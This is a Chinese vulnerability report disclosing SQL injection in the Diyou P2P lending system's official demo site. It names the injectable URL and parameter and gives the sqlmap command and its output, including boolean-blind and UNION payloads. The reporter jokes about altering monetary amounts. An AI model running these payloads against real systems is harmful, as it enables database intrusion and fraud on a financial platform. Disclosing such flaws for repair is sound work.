帝友P2P借贷系统最新版SQL注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 不描述了,忙着去改金额=。= ### 详细说明: ``` 注入点:http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 ``` GET参数value未有效过滤导致存在注入 这是你们家的官网产品演示站对吧? 通知存在注入点,未做进一步测试,赶紧赶紧赶紧修复! ``` python sqlmap.py -u "http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1" --batch -p "value" --dbs sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: value Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 AND 4357=4357 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 UNION ALL SELECT NULL,CONCAT(0x71666b6271,0x59784658734a4b746348,0x7165616971),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload:...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息